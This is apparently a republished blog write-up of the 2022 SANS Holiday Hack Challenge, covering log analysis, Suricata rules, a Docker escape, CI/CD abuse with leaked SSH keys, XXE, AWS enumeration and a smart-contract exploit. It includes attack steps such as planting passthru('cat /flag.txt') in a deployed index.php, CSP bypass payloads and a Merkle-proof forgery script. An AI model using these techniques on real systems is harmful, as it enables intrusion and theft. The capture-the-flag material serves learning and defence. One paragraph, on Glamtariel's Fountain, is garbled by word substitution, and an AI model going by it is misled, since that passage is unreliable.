Cracked it! Highlights from KringleCon 5: Golden Rings

Okanepedia by Okanepedia
January 10, 2023
in Cyber Security
Learning meets fun at the 2022 SANS Holiday Hack Challenge: strap yourself in for a crackerjack ride to the North Pole as I foil Grinchum's foul plan and recover the five golden rings

This is my first year participating in the SANS Holiday Hack Challenge and it was a blast. Through a series of 16 challenges ranging from easy to difficult, I practiced analyzing suspicious network traffic and PowerShell logs, writing Suricata rules, breaking out of a Docker container, finding leaked keys to exploit a GitLab CI/CD pipeline and an AWS user, conducting XML External Entity attacks, and hacking a smart contract to buy a non-fungible token.

The best part of this experience was that it introduced me to new tools and technologies, stretching my cybersecurity knowledge that much further. Here, I share a few highlights from solving the challenges.

Orientation

Each participant receives an avatar to navigate an in-browser video game environment set at the North Pole:

During orientation, you receive a cryptocurrency wallet that the game uses to award KringleCoins for completing challenges and that you use in the final challenge to hack a smart contract. Interestingly, the game keeps track of all KringleCoin transactions in an Ethereum blockchain, meaning a complete record of your progress is stored on this blockchain too.

On to the first ring of the game.

1. Tolkien Ring

Finding the Tolkien Ring required flexing my log analysis muscles.

Wireshark phishing

First, I used Wireshark to analyze the provided .pcap file, which revealed a computer downloading the file Ref_Sept24-2020.zip from a server at adv.epostoday[.]uk:

Peeking inside the ZIP file, I found an executable called Ref_Sept24-2020.scr that triggered two detections in ESET Endpoint Security: BAT/Runner.ES and Generik.TAGTBG. This malware eventually led to a malicious executable running in memory called config.dll, detected by ESET's Advanced Memory Scanner as Win32/Dridex.DD.

Windows event logs

Next, I analyzed the provided .evtx file containing PowerShell logs with Event Viewer. While there are other tools to analyze PowerShell logs, if attackers know how to use living-off-the-land binaries to stay under the radar, defenders should also be well-versed in the native tools an operating system provides.

Since the logs contained 10,434 events, I grouped the events by date and then ran the Find action to look for any events containing the $ character. In PowerShell, $ is used to create and reference variables. I found an attack happening on December 24, 2022, when the attacker ran the following script:

It looks like the attacker found a secret recipe, switched out the secret ingredient of honey for fish oil, and then created a new recipe file. This was recorded as an event with ID 4104, the script block logging event (Event Viewer labels it "Execute a Remote Command"), which captures the text of each script block PowerShell runs whether the command arrived over a remote session or was typed locally. So, I filtered the events by this ID, helping me to find additional malicious events more quickly. One thing to keep in mind: PowerShell splits a long script block across several 4104 events, so a single record may show only part of what ran.
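The filtering above was done by hand in Event Viewer. As an added example (not code from the original post), here is the same hunt scripted in Python over Event XML, the form Event Viewer shows under Details > XML View and that Get-WinEvent's ToXml() emits. It also stitches back together script blocks that PowerShell split across several 4104 records, which a manual search for $ will miss when the interesting line lands in a later part. The three records, the ScriptBlockId and the script text are constructed stand-ins that imitate the recipe tampering described above; they are not the attacker's actual events.

```python
import re
import xml.etree.ElementTree as ET
from collections import defaultdict

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Constructed sample in the Event XML shape Event Viewer shows under
# Details > XML View. The 4103 record (pipeline detail) is here to be
# ignored; the 4104 script block is split over two records, which is what
# PowerShell does with larger script blocks (MessageNumber of MessageTotal).
# The script text imitates the recipe tampering; it is not the real script.
SAMPLE_EVENTS = r"""<Events xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<Event><System><EventID>4103</EventID></System>
  <EventData><Data Name="Payload">CommandInvocation(Get-Content)</Data></EventData></Event>
<Event><System><EventID>4104</EventID></System>
  <EventData><Data Name="MessageNumber">1</Data><Data Name="MessageTotal">2</Data>
  <Data Name="ScriptBlockText">$recipe = Get-Content .\Recipe
$recipe = $recipe -replace 'honey', </Data>
  <Data Name="ScriptBlockId">c0ffee00-0000-4000-8000-000000000001</Data></EventData></Event>
<Event><System><EventID>4104</EventID></System>
  <EventData><Data Name="MessageNumber">2</Data><Data Name="MessageTotal">2</Data>
  <Data Name="ScriptBlockText">'fish oil'
$recipe | Out-File -FilePath .\Recipe.txt</Data>
  <Data Name="ScriptBlockId">c0ffee00-0000-4000-8000-000000000001</Data></EventData></Event>
</Events>"""


def script_blocks(xml_text: str) -> dict:
    """Return {ScriptBlockId: full script text} for every 4104 event,
    stitching multi-part blocks back together in MessageNumber order."""
    parts = defaultdict(dict)
    for ev in ET.fromstring(xml_text).findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", namespaces=NS) != "4104":
            continue
        data = {d.get("Name"): (d.text or "") for d in ev.findall("e:EventData/e:Data", NS)}
        parts[data["ScriptBlockId"]][int(data["MessageNumber"])] = data["ScriptBlockText"]
    return {sid: "".join(chunks[n] for n in sorted(chunks)) for sid, chunks in parts.items()}


# The post's heuristic was "anything containing a $"; two behavioural
# patterns that fit this incident are checked alongside it.
INDICATORS = [
    (re.compile(r"\$\w+"), "uses a variable"),
    (re.compile(r"-replace\b", re.IGNORECASE), "rewrites content"),
    (re.compile(r"\b(?:Out-File|Set-Content|Add-Content)\b", re.IGNORECASE), "writes a file"),
]


def find_suspicious(xml_text: str) -> list:
    """[(ScriptBlockId, [reasons])] for each reassembled block matching an indicator."""
    hits = []
    for sid, text in script_blocks(xml_text).items():
        reasons = [why for rx, why in INDICATORS if rx.search(text)]
        if reasons:
            hits.append((sid, reasons))
    return hits


if __name__ == "__main__":
    blocks = script_blocks(SAMPLE_EVENTS)
    for sid, reasons in find_suspicious(SAMPLE_EVENTS):
        print(sid, "->", ", ".join(reasons))
        print(blocks[sid])
```

To run this against a real .evtx, export the events to XML from Event Viewer, or in PowerShell pipe Get-WinEvent -Path file.evtx through ToXml() on each record and wrap the output in a single root element.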

Suricata Regatta

The last exercise for the Tolkien Ring was writing four Suricata rules to monitor network traffic for a Dridex infestation:

alert dns $HOME_NET any -> any any (msg:"Known bad DNS lookup, possible Dridex infection"; dns.query; content:"adv.epostoday.uk"; nocase; sid:1; rev:1;)

alert http 192.185.57.242 any <> any any (msg:"Investigate suspicious connections, possible Dridex infection"; sid:2; rev:1;)

alert tls any any -> any any (msg:"Investigate bad certificates, possible Dridex infection"; tls.cert_subject; content:"CN=heardbellith.Icanwepeh.nagoya"; sid:3; rev:1;)

alert http any any -> any any (msg:"Suspicious JavaScript function, possible Dridex infection"; file_data; content:"let byteCharacters = atob"; sid:4; rev:1;)

In order, these rules catch DNS lookups for adv.epostoday[.]uk, connections to the IP address 192.185.57[.]242, the use of the malicious server heardbellith.Icanwepeh[.]nagoya identified via the common name (CN) in a TLS certificate, and the use of the JavaScript atob() function to decode a base64-encoded binary string on the client. Two things are worth noting before deploying rules like these: rule 2 has no content match and is bidirectional (<>), so it fires on every HTTP flow to or from that address, which is fine for a known-bad host but noisy otherwise; and file_data inspects the HTTP body on the wire, so rule 4 fires when the JavaScript is delivered to the client, not when it executes. In production you would also give each rule a classtype and a sid from the local range (1,000,000 and up) rather than 1 through 4.

Completing these three challenges earned me the Tolkien Ring:

On to the second ring.

2. Elfen Ring

The most notable challenges for the Elfen Ring were Jail Escape and Jolly CI/CD.

Jail Escape

Jail Escape was a stern reminder that root inside a Docker container can be as good as root on the host. The challenge was to break out of the container. Well, easily done when you're root and the container can see the host's disks:

As the root user, I listed the partition tables for the machine and then mounted the host filesystem, granting me full access to the host. Now I could search for the key, which should be located in the home directory as revealed by the in-game hints:

The caveat for defenders: this only works because the container could see the host's block devices and had the capability to mount them. A container started with Docker's default capability set and no devices passed through cannot do this even as root, which is why --privileged, CAP_SYS_ADMIN and --device deserve a hard look in any review.

Jolly CI/CD

While that was quick, Jolly CI/CD took me the longest of any challenge to figure out. First, we were given a Git repository to clone over HTTP:

From the URL, I could see that the name of the repository was wordpress.flag.net.internal, so I moved to the repository and found a WordPress website. I checked if the website was live:

Yup, the website was functional. I was curious if there were any leaked keys in the source code history. If yes, I should be able to push edits to the source code. So I ran git log:

From the commit messages, it looks like a commit was made after adding assets to fix a whoops. Time to check out the pre-whoops commit:

Excellent, I found a .ssh directory with keys. Let's copy those keys over and configure an SSH agent and a Git user to see if I can impersonate the owner of those keys. Note that the later "whoops" commit removed the keys from the working tree but not from history; only rotating them would have helped:

Now let's return to the main branch and test if we can push a trivial change to the source code (using nano, I simply added a space to one of the files):

So, I accomplished the first part of the challenge by impersonating one of the WordPress developers, but did the website still work after my push?

My push changed something because now the website redirected to port 8080.

Until now, I had ignored the CI/CD portion of the challenge, which should be the key to completing it. The repository contains a .gitlab-ci.yml file, which provides the configuration for a GitLab CI/CD pipeline. Every time you push to the repository, the CI/CD system kicks in, and a GitLab Runner executes the scripts in this YML file. That's as good as achieving remote code execution on the server where GitLab Runner is installed, I thought: anyone who can push to the deployed branch gets to run whatever the pipeline runs, with the runner's privileges.

Looking closer, I saw an rsync script copying all the files from the Git repository to the directory on the web server from which the website was being served. At first, I tried to use rsync to reverse the data flow by copying all the files from the web server to the Git repository, but without success.

After a lot of hypothesis testing, I eventually had my breakthrough insight: Instead of trying to "fix" the WordPress website or run malicious scripts via the build system, serve a website that leaks information from the web server. Inside index.php (located at the top level of the repository), I can comment out the code that loads the WordPress website and run PHP commands that probe the web server.

Indeed, I can even run shell commands with PHP. I found that passthru() worked just fine.

In index.php, I used // to comment out two lines and I added passthru('ls -la /'); on the last line. This creates a website that lists all the files in the root directory of the web server:

Then I pushed this change to the Git repository and the GitLab CI/CD system took care of updating the website for me:

Ah, the Elfen Ring must be in flag.txt! I repeated the previous steps, but this time using passthru('cat /flag.txt'); revealing the Elfen Ring the next time I requested the website:

On to the third ring.

3. Web Ring

The most fun challenge for me was Open Boria Mine Door, although Glamtariel's Fountain was fascinating while also presenting riddles.

Open Boria Mine Door

In Open Boria Mine Door, we were presented with six pins or mini-challenges to bypass input validation or a Content Security Policy in order to connect the entry and exit pipes between the pins, including matching the pipe colors. For most pins, I used HTML to write a list of connecting letter 'o's. Here is my final solution:

Pin 1

There was no validation for Pin 1, so it was a simple matter of HTML and inline CSS:

<p style="letter-spacing: -4px; margin: 0; padding: 0;">oooooooooooooo</p>

Pin 2

Pin 2 had a Content Security Policy that disallowed JavaScript but allowed inline CSS, so that was no problem for my method:

<ul style="list-style: none; line-height: 0.5; letter-spacing: -4px; margin: 0; padding: 0;">
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>oooooooooooooo</li>
</ul>

Pin 3

Pin 3 had a Content Security Policy that disallowed inline CSS but allowed inline JavaScript, so I used JavaScript to set the styles instead:

<script>
    document.write("" +
    "<ul id='o'>" +
        "<li>o</li>" +
        "<li>oooooooooooooooooooooo</li>" +
        "<li>o</li><li>o</li><li>o</li><li>o</li>" +
    "</ul>");
    const o = document.getElementById('o');
    o.style.color = "blue";
    o.style.listStyle = "none";
    o.style.lineHeight = "0.5";
    o.style.letterSpacing = "-4px";
    o.style.margin = "0";
    o.style.padding = "0";
</script>

Pin 4

Pin 4 had no Content Security Policy, but it had a sanitizeInput function on the client side that would strip double quotes, single quotes, left angle brackets, and right angle brackets. The trick here was to realize that this function wasn't triggered by submitting the form, but by the onblur event. In other words, anything that moved focus away from the input field (clicking or tabbing elsewhere) fired onblur and sanitized whatever had been typed. The solution was to submit the form by pressing the Enter key while the field still had focus, so the handler never ran. Client-side sanitization like this is a usability feature, not a security control: it can also be skipped entirely with the browser's developer tools or by sending the request directly.

<ul style="list-style: none; line-height: 0.5; letter-spacing: -4px; margin: 0; padding: 0;">
    <li>o</li>
    <li>o</li>
    <li>oooooooooooooo</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li>o</li>
    <li style="color: blue;">oooooooooooooo</li>
</ul>

Pin 5

Pin 5 had the same sanitizeInput function and bypass, along with a Content Security Policy forbidding inline CSS but allowing inline JavaScript:

<script>
    document.write("" +
      "<ul id='o'>" +
        "<li>o</li>" +
        "<li>o</li>" +
        "<li class='red'>oooooooooooooo</li>" +
        "<li><span class='red'>o</span></li>" +
        "<li><span class='red'>o</span></li>" +
        "<li><span class='red'>o</span>" +
            "<span class='blue'> ooooooooooo</span></li>" +
        "<li><span class='red'>o</span>" +
            "<span class='blue'> oo</span></li>" +
        "<li><span class='red'>o</span>" +
            "<span class='blue'> oo</span></li>" +
        "<li><span class='red'>o</span>" +
            "<span class='blue'> oo</span></li>" +
        "<li>o<span class='blue'> oo</span></li>" +
        "<li>o<span class='blue'> B</span></li>" +
      "</ul>");

    const o = document.getElementById('o');
    o.style.listStyle = "none";
    o.style.lineHeight = "0.5";
    o.style.letterSpacing = "-4px";
    o.style.margin = "0";
    o.style.padding = "0";
    o.style.fontSize = "xx-large";

    const reds = document.getElementsByClassName("red");
    for (let red of reds) {
      red.style.color = "red";
    }

    const blues = document.getElementsByClassName("blue");
    for (let blue of blues) {
      blue.style.color = "blue";
    }
</script>

Pin 6

Finally, Pin 6 didn't sanitize the input, but it used a stricter Content Security Policy forbidding both inline CSS and inline JavaScript. My solution was to use deprecated presentational HTML attributes to get the styles I needed and to use a table instead of a list:

<table border="0" frame="void" rules="none" cellpadding="0" cellspacing="0" width="100%">
    <tr bgcolor="#00FF00">
      <td><font color="#00FF00" size="7">o</font></td>
      <td><font color="#00FF00" size="7">o</font></td>
      <td><font color="#00FF00" size="7">o</font></td>
      <td><font color="#00FF00" size="7">o</font></td>
    </tr>
    <tr bgcolor="red">
      <td><font color="red" size="5">o</font></td>
      <td><font color="red" size="5">o</font></td>
      <td><font color="red" size="5">o</font></td>
      <td><font color="red" size="5">o</font></td>
    </tr>
    <tr bgcolor="blue">
      <td><font color="blue" size="9">o</font></td>
      <td><font color="blue" size="9">o</font></td>
      <td><font color="blue" size="9">o</font></td>
      <td bgcolor="red"><font color="red" size="9">o</font></td>
    </tr>
    <tr bgcolor="blue">
      <td><font color="blue" size="9">o</font></td>
      <td><font color="blue" size="9">o</font></td>
      <td><font color="blue" size="9">o</font></td>
      <td><font color="blue" size="9">o</font></td>
    </tr>
</table>
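What decided the technique for each pin was a single question: does the pin's policy let a style attribute or an inline script element through? Here is that decision written out as an added Python example (not code from the original post or from the challenge). The six policy strings are assumptions reconstructed from the prose descriptions above, since the post does not print the actual headers. The parser follows the CSP3 fallback order (style-src-attr, then style-src, then default-src; likewise script-src-elem, script-src, default-src) and the rule that a nonce or hash source makes browsers ignore 'unsafe-inline'. The Pin 6 fallback works because font, bgcolor and table attributes are HTML, not CSS, so the policy has nothing to say about them.

```python
# Constructed policies that stand in for the pins' actual response headers,
# which the post describes in prose but does not reproduce. Pins 1 and 4
# sent no policy at all, so they map to an empty header here.
PIN_POLICIES = {
    "Pin 1": "",
    "Pin 2": "default-src 'self'; style-src 'self' 'unsafe-inline'",
    "Pin 3": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "Pin 4": "",
    "Pin 5": "default-src 'self'; script-src 'self' 'unsafe-inline'",
    "Pin 6": "default-src 'self'",
}

# Fallback chains for the two things the pins cared about: a style="" attribute
# and an inline <script> element. Browsers consult the most specific directive
# and fall back to the next one only when it is absent.
STYLE_ATTR_CHAIN = ("style-src-attr", "style-src", "default-src")
SCRIPT_ELEM_CHAIN = ("script-src-elem", "script-src", "default-src")


def parse_csp(header: str) -> dict:
    """Turn a Content-Security-Policy header into {directive: [source, ...]}."""
    policy = {}
    for clause in header.split(";"):
        tokens = clause.split()
        if tokens:
            policy[tokens[0].lower()] = [t.lower() for t in tokens[1:]]
    return policy


def allows_inline(policy: dict, chain) -> bool:
    """True if inline content governed by this chain would apply or execute."""
    for directive in chain:
        if directive in policy:
            sources = policy[directive]
            # A nonce or hash source makes browsers ignore 'unsafe-inline'.
            if any(s.startswith("'nonce-") or s.startswith("'sha") for s in sources):
                return False
            return "'unsafe-inline'" in sources
    return True  # nothing governs it: no CSP, or no directive in the chain


def pick_technique(header: str) -> str:
    """Map a policy to the approach that worked for the pins in the post."""
    policy = parse_csp(header)
    if allows_inline(policy, STYLE_ATTR_CHAIN):
        return "inline CSS in a style attribute"
    if allows_inline(policy, SCRIPT_ELEM_CHAIN):
        return "inline JavaScript that sets element.style"
    return "presentational HTML attributes (font, bgcolor, table)"


def plan_all(pins: dict = PIN_POLICIES) -> dict:
    """Technique per pin, given each pin's policy header."""
    return {pin: pick_technique(header) for pin, header in pins.items()}


if __name__ == "__main__":
    for pin, technique in plan_all().items():
        print(f"{pin}: {technique}")
```

Feed pick_technique() a header copied from the browser's Network tab and it tells you which of the three approaches is still open; a policy that closes all three is one where presentational attributes are the last resort, exactly the situation Pin 6 forced.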

Glamtariel’s Fountain

Glamtariel’s Fountain was a possibility to apply XML Exterior Entity (XXE) assaults. Determining the right way to outline a customized XML entity, defining an entity that requests a file from the server, and including that entity as a payload to an HTTP request was not onerous. The toughest half was determining the in-game riddles to divine the trail to the information that the server would leak. Right here is the breakthrough request revealing the situation of the gold ring:

I’d supply two classes discovered from this problem. First, use the Content material Sort Converter extension in Burp to transform JSON payloads to XML. Second, attempt inserting the XXE payload in several tags – it took me a very long time to determine that every one I needed to do was place the &xxe; payload within the reqType tag as a substitute of the imgDrop tag.

On to the fourth ring.

4. Cloud Ring

Playing for the Cloud Ring was a beginner's foray into the Amazon Web Services (AWS) Command Line Interface (CLI).

The highlight of this set of challenges was using trufflehog to find AWS credentials in a Git repository and then using them to authenticate as an AWS user. An attacker who gets to this position can confirm which principal the keys belong to with aws sts get-caller-identity and then use aws iam commands (such as aws iam list-attached-user-policies and aws iam list-user-policies on that user name) to query the policies that apply to the user, and thus which cloud assets can be accessed and abused. The defensive corollary is the same as for the SSH keys in Jolly CI/CD: any key found in a repository should be treated as compromised and rotated, because removing it from the latest commit does not remove it from history.
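The Jolly CI/CD keys and the AWS credentials here were found the same way: by reading history rather than the checked-out tree. As an added example (not from the post, and not trufflehog's own code), this Python script scans constructed git log -p output for the two kinds of secret that turned up in those two challenges. It examines only added lines, so a later "whoops" commit that deletes the file is reported for what it is: a removal that leaves the secret in history. The sample log, commit hashes and SSH key body are constructed; the AWS pair is Amazon's documentation example key, not a live credential. The entropy detector imitates trufflehog's generic approach on long base64-looking tokens.

```python
import math
import re
from collections import Counter

# Constructed `git log -p --all` output standing in for the challenge repo:
# commit 2222... adds the keys; commit 1111... (newer, so listed first)
# deletes them again. Hashes and the SSH key body are fake; the AWS pair is
# Amazon's documentation example (AKIAIOSFODNN7EXAMPLE / wJalr...EXAMPLEKEY).
SAMPLE_GIT_LOG = """\
commit 1111111111111111111111111111111111111111
Author: dev <dev@example.invalid>

    whoops

diff --git a/.ssh/id_rsa b/.ssh/id_rsa
deleted file mode 100644
--- a/.ssh/id_rsa
+++ /dev/null
@@ -1,3 +0,0 @@
------BEGIN OPENSSH PRIVATE KEY-----
-b3BlbnNzaC1rZXktdjEAAAAABG5vbmU=
------END OPENSSH PRIVATE KEY-----
commit 2222222222222222222222222222222222222222
Author: dev <dev@example.invalid>

    added assets

diff --git a/.env b/.env
new file mode 100644
--- /dev/null
+++ b/.env
@@ -0,0 +1,2 @@
+AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
+AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
diff --git a/.ssh/id_rsa b/.ssh/id_rsa
new file mode 100644
--- /dev/null
+++ b/.ssh/id_rsa
@@ -0,0 +1,3 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmU=
+-----END OPENSSH PRIVATE KEY-----
"""

# Pattern detectors: name plus regex. A capturing group, when present, is
# the secret value itself rather than the whole matched line.
DETECTORS = [
    ("ssh-private-key", re.compile(r"-----BEGIN (?:OPENSSH|RSA|EC|DSA) PRIVATE KEY-----")),
    ("aws-access-key-id", re.compile(r"(?<![A-Z0-9])(?:AKIA|ASIA)[A-Z0-9]{16}(?![A-Z0-9])")),
    ("aws-secret-access-key",
     re.compile(r"(?i)aws_secret_access_key\s*[=:]\s*['\"]?([A-Za-z0-9/+=]{40})")),
]
# Generic detector: any 40+ character base64-looking token with high entropy.
ENTROPY_TOKEN = re.compile(r"(?<![A-Za-z0-9/+])[A-Za-z0-9/+]{40,}={0,2}")
ENTROPY_THRESHOLD = 4.0  # bits per character; random base64 sits well above this


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values()) if s else 0.0


def scan_git_log(log_text: str) -> list:
    """Return (commit, path, detector, match) for every secret a commit introduced.
    Only '+' lines are examined: a later commit deleting the file does not undo the leak."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit, path = line.split()[1], None
        elif line.startswith("+++ "):
            path = line[4:]
            path = path[2:] if path.startswith("b/") else path
        elif line.startswith("+") and commit and path:
            added = line[1:]
            for name, rx in DETECTORS:
                m = rx.search(added)
                if m:
                    findings.append((commit, path, name, m.group(m.lastindex or 0)))
            for token in ENTROPY_TOKEN.findall(added):
                if shannon_entropy(token) >= ENTROPY_THRESHOLD:
                    findings.append((commit, path, "high-entropy-token", token))
    return findings


if __name__ == "__main__":
    for commit, path, detector, match in scan_git_log(SAMPLE_GIT_LOG):
        print(f"{commit[:7]} {path}: {detector} -> {match}")
```

Against a real repository, pipe git log -p --all into scan_git_log(); the --all matters because secrets often survive on branches and tags that were never merged.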

On to the fifth ring.

5. Burning Ring of Fire

The most instructive part of this set of challenges was learning about Merkle trees to exploit a smart contract and get on the presale list for purchasing a non-fungible token (NFT). Here the challenge was to discover the proof values that, together with my wallet address and the root value of a Merkle tree, proved my inclusion on the presale list.

After a few unsuccessful attempts to provide proof values, I realized that I'd never be able to work out the proof values for the provided root value because there was no way to know all the leaf values used to calculate it. I needed to change the root value so that I could present a valid Merkle tree.

Using Professor QPetabyte's tool, I created a Merkle tree from two leaves consisting of my wallet address and the address for the BSRS_nft smart contract, which I found using the in-game Blockchain Explorer in block two of the game's Ethereum blockchain. The tool generated the root value of this tree and the proof value for my wallet address. Then I used Burp to intercept the request to the server and changed the default root value so that I could submit a valid Merkle tree. That is the flaw in one sentence: a Merkle proof only proves membership against a root the verifier already trusts, and here the root was taken from the request instead of being fixed in the contract. Here is my NFT sporc, bought at a fixed price of 100 KringleCoins:
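To make the forgery concrete, here is an added Python example (not the post's code, not the contract's, and not Professor QPetabyte's tool) of the tree construction and proof check, followed by the attack: build a two-leaf tree of your own wallet plus any other address and the proof verifies against the root you just made. The addresses are constructed; the hash is sha256 as a stand-in because hashlib has no keccak256 (its sha3_256 is NIST SHA-3, which pads differently), but the sorted-pair convention matches OpenZeppelin's MerkleProof, and the general construction handles any number of leaves, not just the two in the exploit.

```python
import hashlib

# hashlib offers no keccak256 (sha3_256 is NIST SHA-3, padded differently),
# so this demo hashes with sha256; the tree logic is identical either way.
def H(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()


def leaf_for(address: str) -> bytes:
    """Leaf = hash of the raw 20-byte address, as allowlist contracts commonly do."""
    raw = bytes.fromhex(address[2:] if address.startswith("0x") else address)
    if len(raw) != 20:
        raise ValueError("expected a 20-byte address")
    return H(raw)


def pair_hash(a: bytes, b: bytes) -> bytes:
    """Commutative pair hash (inputs sorted), the OpenZeppelin MerkleProof
    convention, so a proof needs no left/right flags."""
    return H(a + b) if a <= b else H(b + a)


def build_levels(leaves):
    """Every level of the tree, leaves first; an unpaired node is carried up as-is."""
    levels = [list(leaves)]
    while len(levels[-1]) > 1:
        cur, nxt = levels[-1], []
        for i in range(0, len(cur), 2):
            nxt.append(pair_hash(cur[i], cur[i + 1]) if i + 1 < len(cur) else cur[i])
        levels.append(nxt)
    return levels


def merkle_root(leaves) -> bytes:
    return build_levels(leaves)[-1][0]


def merkle_proof(leaves, index: int) -> list:
    """Sibling hashes from the leaf up to (not including) the root."""
    path = []
    for level in build_levels(leaves)[:-1]:
        sibling = index ^ 1
        if sibling < len(level):
            path.append(level[sibling])
        index //= 2
    return path


def verify(root: bytes, leaf: bytes, proof) -> bool:
    """What the contract runs: fold the proof into the leaf and compare to the root."""
    node = leaf
    for sibling in proof:
        node = pair_hash(node, sibling)
    return node == root


def forge_presale_proof(my_wallet: str, other_address: str):
    """The attack from the post: a two-leaf tree of (my wallet, any other address).
    Its root and proof are mutually consistent, so verification succeeds for
    any verifier that accepts the root from the caller."""
    leaves = [leaf_for(my_wallet), leaf_for(other_address)]
    return merkle_root(leaves), merkle_proof(leaves, 0)


# Constructed addresses; the real wallet and BSRS_nft addresses are not reproduced.
MY_WALLET = "0x" + "11" * 20
OTHER_ADDRESS = "0x" + "22" * 20
PRESALE_LIST = ["0x" + "aa" * 20, "0x" + "bb" * 20, "0x" + "cc" * 20]  # the legitimate allowlist

if __name__ == "__main__":
    real_root = merkle_root([leaf_for(a) for a in PRESALE_LIST])
    forged_root, proof = forge_presale_proof(MY_WALLET, OTHER_ADDRESS)
    print("against the real root:  ", verify(real_root, leaf_for(MY_WALLET), proof))
    print("against the forged root:", verify(forged_root, leaf_for(MY_WALLET), proof))
```

The two print lines are the whole lesson: the same proof is worthless against the root the contract should have held and perfect against the one the attacker supplied. The fix is to store the root in contract state set by the owner and never read it from the transaction.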

An ugly specimen indeed.

Finale

A big thanks to the organizers of the SANS Holiday Hack Challenge for stretching my mind in new ways and helping to deepen my cybersecurity knowledge. Not only am I looking forward to next year's challenge, but I'll also be trying out the 2020 and 2021 editions. And if you haven't participated in this challenge before, I hope these highlights have piqued your interest.
